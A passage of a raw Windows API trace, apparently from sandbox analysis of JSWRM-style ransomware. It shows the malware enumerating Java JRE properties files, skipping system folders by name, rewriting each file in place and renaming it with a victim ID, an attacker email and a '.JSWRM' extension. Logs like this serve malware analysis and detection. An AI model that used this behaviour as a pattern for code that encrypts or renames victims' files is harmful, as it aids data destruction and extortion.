0x458 [0069.934] GetFileSizeEx (in: hFile=0x458, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=3306) returned 1 [0069.934] SetFilePointer (in: hFile=0x458, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0069.934] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xce0) returned 0x24e1e0 [0069.934] ReadFile (in: hFile=0x458, lpBuffer=0x24e1e0, nNumberOfBytesToRead=0xce0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24e1e0*, lpNumberOfBytesRead=0x345e89c*=0xce0, lpOverlapped=0x0) returned 1 [0069.936] SetFilePointer (in: hFile=0x458, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0069.936] WriteFile (in: hFile=0x458, lpBuffer=0x24e1e0*, nNumberOfBytesToWrite=0xce0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24e1e0*, lpNumberOfBytesWritten=0x345e898*=0xce0, lpOverlapped=0x0) returned 1 [0069.936] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1e0 | out: hHeap=0x1e0000) returned 1 [0069.936] CloseHandle (hObject=0x458) returned 1 [0069.936] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0069.936] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0069.936] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0069.936] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0069.936] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0069.936] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0069.936] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0069.936] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a420 [0069.936] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a420, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0069.936] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a420 | out: hHeap=0x1e0000) returned 1 [0069.936] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d140 [0069.936] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247c78 [0069.936] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d140 | out: hHeap=0x1e0000) returned 1 [0069.937] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0069.937] MoveFileW (lpExistingFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_de.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\messages_de.properties"), lpNewFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_de.properties.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\messages_de.properties.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0069.937] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247c78 | out: hHeap=0x1e0000) returned 1 [0069.937] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0069.937] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0069.937] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241060 | out: hHeap=0x1e0000) returned 1 [0069.937] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241038 | out: hHeap=0x1e0000) returned 1 [0069.937] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8b9204e, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8b9204e, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8b9204e, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0xe10, dwReserved0=0xfffffffe, dwReserved1=0x345ea88, cFileName="messages_es.properties", cAlternateFileName="MESSAG~3.PRO")) returned 1 [0069.937] lstrcmpiW (lpString1="messages_es.properties", lpString2=".") returned 1 [0069.937] lstrcmpiW (lpString1="messages_es.properties", lpString2="..") returned 1 [0069.937] lstrcmpiW (lpString1="messages_es.properties", lpString2="...") returned 1 [0069.937] lstrcmpiW (lpString1="messages_es.properties", lpString2="windows") returned -1 [0069.937] lstrcmpiW (lpString1="messages_es.properties", lpString2="recovery") returned -1 [0069.937] lstrcmpiW (lpString1="messages_es.properties", lpString2="perflogs") returned -1 [0069.937] lstrcmpiW (lpString1="messages_es.properties", lpString2="documents and settings") returned 1 [0069.937] lstrcmpiW (lpString1="messages_es.properties", lpString2="$RECYCLE.BIN") returned 1 [0069.937] lstrcmpiW (lpString1="messages_es.properties", lpString2="system volume information") returned -1 [0069.937] lstrcmpiW (lpString1="messages_es.properties", lpString2="msocache") returned -1 [0069.937] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0069.937] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages_es.properties", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0069.937] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241128 [0069.937] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages_es.properties", cchWideChar=22, lpMultiByteStr=0x241128, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages_es.properties", lpUsedDefaultChar=0x0) returned 22 [0069.938] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0069.938] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0069.938] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages_es.properties", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0069.938] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0069.938] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages_es.properties", cchWideChar=22, lpMultiByteStr=0x241178, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages_es.properties", lpUsedDefaultChar=0x0) returned 22 [0069.938] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0069.938] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0069.938] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0069.938] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0069.938] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0069.938] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0069.938] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_es.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\messages_es.properties"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x458 [0069.939] GetFileSizeEx (in: hFile=0x458, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=3600) returned 1 [0069.939] SetFilePointer (in: hFile=0x458, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0069.939] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe10) returned 0x24e1e0 [0069.939] ReadFile (in: hFile=0x458, lpBuffer=0x24e1e0, nNumberOfBytesToRead=0xe10, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24e1e0*, lpNumberOfBytesRead=0x345e89c*=0xe10, lpOverlapped=0x0) returned 1 [0069.940] SetFilePointer (in: hFile=0x458, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0069.940] WriteFile (in: hFile=0x458, lpBuffer=0x24e1e0*, nNumberOfBytesToWrite=0xe10, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24e1e0*, lpNumberOfBytesWritten=0x345e898*=0xe10, lpOverlapped=0x0) returned 1 [0069.941] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1e0 | out: hHeap=0x1e0000) returned 1 [0069.941] CloseHandle (hObject=0x458) returned 1 [0069.941] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0069.941] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0069.941] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0069.941] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0069.941] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0069.941] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0069.941] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0069.941] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a348 [0069.941] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a348, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0069.941] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a348 | out: hHeap=0x1e0000) returned 1 [0069.941] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cdf8 [0069.941] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2476a8 [0069.941] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cdf8 | out: hHeap=0x1e0000) returned 1 [0069.941] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0069.941] MoveFileW (lpExistingFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_es.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\messages_es.properties"), lpNewFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_es.properties.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\messages_es.properties.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0069.941] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2476a8 | out: hHeap=0x1e0000) returned 1 [0069.941] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0069.941] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0069.941] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0069.942] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241128 | out: hHeap=0x1e0000) returned 1 [0069.942] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8b9204e, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8b9204e, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8b9204e, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0xd51, dwReserved0=0xfffffffe, dwReserved1=0x345ea88, cFileName="messages_fr.properties", cAlternateFileName="MESSAG~4.PRO")) returned 1 [0069.942] lstrcmpiW (lpString1="messages_fr.properties", lpString2=".") returned 1 [0069.942] lstrcmpiW (lpString1="messages_fr.properties", lpString2="..") returned 1 [0069.942] lstrcmpiW (lpString1="messages_fr.properties", lpString2="...") returned 1 [0069.942] lstrcmpiW (lpString1="messages_fr.properties", lpString2="windows") returned -1 [0069.942] lstrcmpiW (lpString1="messages_fr.properties", lpString2="recovery") returned -1 [0069.942] lstrcmpiW (lpString1="messages_fr.properties", lpString2="perflogs") returned -1 [0069.942] lstrcmpiW (lpString1="messages_fr.properties", lpString2="documents and settings") returned 1 [0069.942] lstrcmpiW (lpString1="messages_fr.properties", lpString2="$RECYCLE.BIN") returned 1 [0069.942] lstrcmpiW (lpString1="messages_fr.properties", lpString2="system volume information") returned -1 [0069.942] lstrcmpiW (lpString1="messages_fr.properties", lpString2="msocache") returned -1 [0069.942] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0069.942] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages_fr.properties", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0069.942] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0069.942] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages_fr.properties", cchWideChar=22, lpMultiByteStr=0x241268, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages_fr.properties", lpUsedDefaultChar=0x0) returned 22 [0069.942] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0069.942] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0069.942] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages_fr.properties", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0069.942] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0069.942] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages_fr.properties", cchWideChar=22, lpMultiByteStr=0x2411c8, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages_fr.properties", lpUsedDefaultChar=0x0) returned 22 [0069.942] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0069.942] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0069.942] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0069.942] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0069.942] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0069.942] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0069.942] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_fr.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\messages_fr.properties"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x458 [0069.942] GetFileSizeEx (in: hFile=0x458, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=3409) returned 1 [0069.942] SetFilePointer (in: hFile=0x458, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0069.943] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd50) returned 0x24e1e0 [0069.943] ReadFile (in: hFile=0x458, lpBuffer=0x24e1e0, nNumberOfBytesToRead=0xd50, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24e1e0*, lpNumberOfBytesRead=0x345e89c*=0xd50, lpOverlapped=0x0) returned 1 [0069.956] SetFilePointer (in: hFile=0x458, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0069.956] WriteFile (in: hFile=0x458, lpBuffer=0x24e1e0*, nNumberOfBytesToWrite=0xd50, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24e1e0*, lpNumberOfBytesWritten=0x345e898*=0xd50, lpOverlapped=0x0) returned 1 [0069.956] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1e0 | out: hHeap=0x1e0000) returned 1 [0069.956] CloseHandle (hObject=0x458) returned 1 [0069.956] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0069.956] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0069.956] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0069.956] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0069.956] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0069.956] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0069.956] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0069.956] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a258 [0069.956] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a258, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0069.956] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a258 | out: hHeap=0x1e0000) returned 1 [0069.956] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cff0 [0069.956] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2476a8 [0069.956] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cff0 | out: hHeap=0x1e0000) returned 1 [0069.956] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0069.956] MoveFileW (lpExistingFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_fr.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\messages_fr.properties"), lpNewFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_fr.properties.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\messages_fr.properties.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0069.957] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2476a8 | out: hHeap=0x1e0000) returned 1 [0069.957] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0069.957] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0069.957] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0069.957] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0069.957] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8b9204e, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8b9204e, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8b9204e, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0xc97, dwReserved0=0xfffffffe, dwReserved1=0x345ea88, cFileName="messages_it.properties", cAlternateFileName="MEC9EA~1.PRO")) returned 1 [0069.957] lstrcmpiW (lpString1="messages_it.properties", lpString2=".") returned 1 [0069.957] lstrcmpiW (lpString1="messages_it.properties", lpString2="..") returned 1 [0069.957] lstrcmpiW (lpString1="messages_it.properties", lpString2="...") returned 1 [0069.957] lstrcmpiW (lpString1="messages_it.properties", lpString2="windows") returned -1 [0069.957] lstrcmpiW (lpString1="messages_it.properties", lpString2="recovery") returned -1 [0069.957] lstrcmpiW (lpString1="messages_it.properties", lpString2="perflogs") returned -1 [0069.957] lstrcmpiW (lpString1="messages_it.properties", lpString2="documents and settings") returned 1 [0069.957] lstrcmpiW (lpString1="messages_it.properties", lpString2="$RECYCLE.BIN") returned 1 [0069.957] lstrcmpiW (lpString1="messages_it.properties", lpString2="system volume information") returned -1 [0069.957] lstrcmpiW (lpString1="messages_it.properties", lpString2="msocache") returned -1 [0069.957] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0069.957] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages_it.properties", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0069.957] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241100 [0069.957] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages_it.properties", cchWideChar=22, lpMultiByteStr=0x241100, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages_it.properties", lpUsedDefaultChar=0x0) returned 22 [0069.957] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0069.957] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0069.957] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages_it.properties", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0069.957] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241038 [0069.957] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages_it.properties", cchWideChar=22, lpMultiByteStr=0x241038, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages_it.properties", lpUsedDefaultChar=0x0) returned 22 [0069.957] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0069.958] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0069.958] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0069.958] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0069.958] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0069.958] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0069.958] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_it.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\messages_it.properties"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x458 [0069.958] GetFileSizeEx (in: hFile=0x458, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=3223) returned 1 [0069.958] SetFilePointer (in: hFile=0x458, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0069.958] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc90) returned 0x24e1e0 [0069.958] ReadFile (in: hFile=0x458, lpBuffer=0x24e1e0, nNumberOfBytesToRead=0xc90, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24e1e0*, lpNumberOfBytesRead=0x345e89c*=0xc90, lpOverlapped=0x0) returned 1 [0069.960] SetFilePointer (in: hFile=0x458, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0069.960] WriteFile (in: hFile=0x458, lpBuffer=0x24e1e0*, nNumberOfBytesToWrite=0xc90, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24e1e0*, 